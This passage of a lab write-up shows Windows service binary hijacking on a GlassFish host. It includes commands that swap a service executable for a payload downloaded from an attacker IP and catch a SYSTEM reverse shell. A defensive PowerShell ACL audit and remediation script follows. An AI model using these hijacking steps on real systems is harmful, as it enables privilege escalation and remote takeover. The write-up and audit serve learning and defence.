Binary Hijacking


The domain1 service runs as SYSTEM but executes a binary from a directory that any user can write to. Because C:\glassfish4\glassfish\domains\domain1\bin\ is writable by anyone, including the current user, arthur, I could simply replace the binary.

PS C:\glassfish4\glassfish\domains\domain1\bin> whoami
fishyyy\arthur
 
PS C:\glassfish4\glassfish\domains\domain1\bin> mv C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe \domain1Service.exe.bak
PS C:\glassfish4\glassfish\domains\domain1\bin> iwr -Uri http://192.168.45.249/domain1Service.exe -OutFile C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe

Renaming the original binary and delivering the payload

PS C:\Users\arthur> Restart-Computer

Restarting the target system to invoke the payload in the domain1 service

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ nnc 1235                   
listening on [any] 1235 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.219.168] 49668
Microsoft Windows [Version 10.0.19042.1288]
(c) Microsoft Corporation. All rights reserved.
 
C:\WINDOWS\system32> whoami
 whoami
nt authority\system
 
C:\WINDOWS\system32> hostname
 hostname
Fishyyy
 
C:\WINDOWS\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.219.168
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.219.254

System-level compromise: the replaced service binary runs as NT AUTHORITY\SYSTEM on the host Fishyyy (192.168.219.168).
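The root cause above is a service binary whose directory grants write access to ordinary users. The following audit script is an added example, not part of the original write-up or of the GlassFish project: it enumerates every Windows service, resolves the executable from its command line, and reports any ACE that gives write, modify or full-control rights to low-privilege principals on either the binary or its parent directory, then offers an icacls reset for a directory an administrator has reviewed. The principal list, the remediation ACL and the `domain1` path in the usage comment are assumptions chosen for illustration; run it from an elevated PowerShell on the host being checked.

```powershell
# Added audit example, not from the original write-up: find Windows services whose
# executable, or the directory holding it, grants write access to low-privilege
# principals, and optionally reset that directory's ACL with icacls.
# The principal list and the remediation ACL below are assumptions for illustration.

$WeakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights on the path lets a user overwrite or swap the service binary
$WriteBits = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

function Get-ServiceBinaryPath {
    # Win32_Service.PathName is a command line: "C:\dir\svc.exe" args  or  C:\dir\svc.exe args
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(\S+)')     { return $Matches[1] }
    return $null
}

function Test-WeakWriteAcl {
    # Returns one "principal: rights" string per Allow ACE that lets a weak principal write
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($WeakPrincipals -contains $_.IdentityReference.Value) -and
        (($_.FileSystemRights -band $WriteBits) -ne 0)
    } | ForEach-Object { "$($_.IdentityReference.Value): $($_.FileSystemRights)" }
}

function Find-WritableServiceBinaries {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not $exe) { return }
        $dir = Split-Path -Parent $exe
        # @() wrappers keep empty results from turning into $null entries
        $findings = @(Test-WeakWriteAcl -Path $exe | ForEach-Object { "file $_" }) +
                    @(Test-WeakWriteAcl -Path $dir | ForEach-Object { "dir $_" })
        if ($findings.Count -gt 0) {
            [pscustomobject]@{
                Service  = $svc.Name
                RunsAs   = $svc.StartName   # LocalSystem is the worst case
                Binary   = $exe
                WeakACEs = ($findings -join '; ')
            }
        }
    }
}

function Repair-ServiceDirectoryAcl {
    # Drop inherited ACEs and grant write only to SYSTEM and Administrators;
    # ordinary users keep read/execute so the service can still start and be inspected.
    param([Parameter(Mandatory)][string]$Directory)
    icacls $Directory /inheritance:r `
        /grant:r 'NT AUTHORITY\SYSTEM:(OI)(CI)F' `
        /grant:r 'BUILTIN\Administrators:(OI)(CI)F' `
        /grant:r 'BUILTIN\Users:(OI)(CI)RX'
}

# Report first; fix individual directories only after reviewing the output, e.g.
#   Repair-ServiceDirectoryAcl -Directory 'C:\glassfish4\glassfish\domains\domain1\bin'
Find-WritableServiceBinaries | Format-Table -AutoSize
```

The check inspects the parent directory as well as the file because, as the session above shows, a writable directory is enough: the attacker never has to modify the original binary, only rename it and drop a new file under the same name. For detection, pair the ACL audit with file-creation and rename monitoring (for example Sysmon event ID 11) on service binary directories, alerting when the writing account is not SYSTEM or a known installer.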